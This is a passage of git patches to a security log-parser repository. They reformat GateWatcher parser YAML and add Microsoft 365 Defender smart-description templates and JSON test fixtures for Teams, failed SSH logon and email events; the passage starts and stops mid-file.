"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"98\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T11:32:12.301000Z", + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "BUSOHGFTVB" + } + } + }, + "network": { + "application": "meet", + "transport": "tcp" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_meet_sample1.json b/Google Cloud/google-report/tests/test_meet_sample1.json index 406a0943c..fd7b1fa66 100644 --- a/Google Cloud/google-report/tests/test_meet_sample1.json +++ b/Google Cloud/google-report/tests/test_meet_sample1.json @@ -41,13 +41,20 @@ "transport": "udp" }, "related": { + "ip": [ + "5555:333:333:5555:5555:5555:5555:5555" + ], "user": [ "jone.doe" ] }, + "source": { + "address": "5555:333:333:5555:5555:5555:5555:5555", + "ip": "5555:333:333:5555:5555:5555:5555:5555" + }, "user": { "domain": "test.com", - "email": "jone.doe@test.com", + "email": "joe.done@test.com", "id": "1098488062555", "name": "jone.doe" } From 74e459dd00f628dc287820ee60efef6fb61789ab Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 10:39:44 +0100 Subject: [PATCH 086/150] Prettier on another parser to pass tests --- GateWatcher/aioniq/ingest/parser.yml | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 3cc13d747..20c57feb0 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -206,12 +206,12 @@ stages: tls: actions: - set: - tls.server.issuer: "{{json_load.message.tls.issuerdn}}" - tls.server.not_before: "{{json_load.message.tls.notbefore}}" - tls.server.certificate_chain: "{{json_load.message.tls.chain}}" - tls.server.subject: "{{json_load.message.tls.subject}}" - gatewatcher.tls: "{{json_load.message.tls}}" - gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" - gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" - tls.version: "{{json_load.message.tls.version}}" - tls.server.not_after: "{{json_load.message.tls.notafter}}" + tls.server.issuer: "{{json_load.message.tls.issuerdn}}" + tls.server.not_before: "{{json_load.message.tls.notbefore}}" + tls.server.certificate_chain: "{{json_load.message.tls.chain}}" + tls.server.subject: "{{json_load.message.tls.subject}}" + gatewatcher.tls: "{{json_load.message.tls}}" + gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" + gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" + tls.version: "{{json_load.message.tls.version}}" + tls.server.not_after: "{{json_load.message.tls.notafter}}" From ba631f3d23a2724a148dea4093f6010b3d176331 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 10:41:05 +0100 Subject: [PATCH 087/150] fix on linting --- GateWatcher/aioniq/_meta/fields.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 07bae26e7..8bc01d294 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml @@ -389,16 +389,16 @@ gatewatcher.tls: name: gatewatcher.tls type: text -gatewatcher.tls_sni: - description: This field represents the TLS SNI field in a TLS metadata - name: gatewatcher.tls_sni - type: text - gatewatcher.tls_fingerprint: description: This field represents the TLS server fingerprint field in a TLS metadata name: gatewatcher.tls_fingerprint type: text +gatewatcher.tls_sni: + description: This field represents the TLS SNI field in a TLS metadata + name: gatewatcher.tls_sni + type: text + gatewatcher.ttp: description: This field is used for retrohunt alerts name: gatewatcher.ttp From 97df6b20679a01fb368a3a46dc440ef564086d46 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 12:07:17 +0100 Subject: [PATCH 088/150] Microsoft 365 defender : fix on smart descriptions --- .../_meta/smart-descriptions.json | 61 ++++++++++++ .../tests/test_cloud_app4.json | 63 ++++++++++++ .../tests/test_device_logon_failed.json | 98 +++++++++++++++++++ .../tests/test_email_delivered.json | 76 ++++++++++++++ .../tests/test_email_delivered2.json | 76 ++++++++++++++ 5 files changed, 374 insertions(+) create mode 100644 Microsoft/microsoft-365-defender/tests/test_cloud_app4.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_delivered.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_delivered2.json diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json index 21e3caf3c..6232e66f8 100644 --- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json +++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json @@ -1,4 +1,14 @@ [ + { + "value": "A new {action.type} cloud app event have been received", + "conditions": [ + { + "field": "event.dataset", + "value": "cloud_app_events" + }, + { "field": "action.type" } + ] + }, { "value": "New incident {microsoft.defender.investigation.name}: {email.attachments.file.name} with hash {email.attachments.file.hash.sha256}", "conditions": [ @@ -132,6 +142,35 @@ } ] }, + { + "value": "{user.domain}\\{user.name} failed to log on {host.name}", + "conditions": [ + { + "field": "event.dataset", + "value": "device_logon_events" + }, + { + "field": "host.name" + }, + { + "field": "user.name" + }, + { + "field": "user.domain" + }, + { + "field": "action.type", + "value": "LogonFailed" + } + ], + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on" + } + ] + }, { "value": "{user.domain}\\{user.name} logged on {host.name}", "conditions": [ @@ -402,6 +441,28 @@ { "field": "email.to.address" } ] }, + { + "value": "{event.action} email from {email.from.address} to {email.to.address}", + "conditions": [ + { "field": "event.dataset", "value": "email_events" }, + { "field": "email.from.address" }, + { "field": "email.to.address" } + ] + }, + { + "value": "{event.action} email from {email.from.address}", + "conditions": [ + { "field": "event.dataset", "value": "email_events" }, + { "field": "email.from.address" } + ] + }, + { + "value": "{event.action} email to {email.to.address}", + "conditions": [ + { "field": "event.dataset", "value": "email_events" }, + { "field": "email.to.address" } + ] + }, { "value": "{action.type} on {url.original}", "conditions": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json new file mode 100644 index 000000000..86f044fe7 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json @@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "network" + ], + "dataset": "cloud_app_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "Application": "Microsoft Teams", + "ApplicationId": "28375", + "IsAdminOperation": "false", + "IsExternalUser": false, + "IsImpersonated": false, + "RawEventData": "{\"ChatThreadId\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"CommunicationType\": \"GroupChat\", \"CreationTime\": \"2024-10-28T14:18:38Z\", \"ExtraProperties\": [], \"Id\": \"abcd1234-ef09-1234-abcd-123456abcdef\", \"ItemName\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"MessageId\": \"1730125116564\", \"MessageVersion\": \"0\", \"MessageVisibilityTime\": \"2022-09-21T08:33:35Z\", \"Operation\": \"MessageReadReceiptReceived\", \"OrganizationId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"ParticipantInfo\": {\"HasForeignTenantUsers\": false, \"HasGuestUsers\": false, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [], \"ParticipatingSIPDomains\": [], \"ParticipatingTenantIds\": [\"12345678-abcd-ef09-1234-123456abcdef\"]}, \"RecordType\": 25, \"ResourceTenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"UserId\": \"john.doe@company.fr\", \"UserKey\": \"abcd1234-1234-1234-1234-abcdef123456\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\"}" + }, + "type": "MessageReadReceiptReceived" + }, + "microsoft": { + "defender": { + "activity": { + "objects": [ + { + "Role": "Parameter", + "ServiceObjectType": "Microsoft Team", + "Type": "Structured object" + }, + { + "ApplicationId": 11161, + "ApplicationInstance": 0, + "Id": "abcd1234-1234-1234-1234-abcdef123456", + "Name": "John DOE", + "Role": "Actor", + "Type": "User" + } + ], + "type": "Basic" + }, + "report": { + "id": "98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef" + } + } + }, + "user": { + "full_name": "John DOE" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json new file mode 100644 index 000000000..1d69ebb63 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json @@ -0,0 +1,98 @@ +{ + "input": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": \"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", \"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, \"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": \"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", \"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, \"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "device_logon_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-18T10:07:22.681617Z", + "action": { + "properties": { + "InitiatingProcessCommandLine": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc 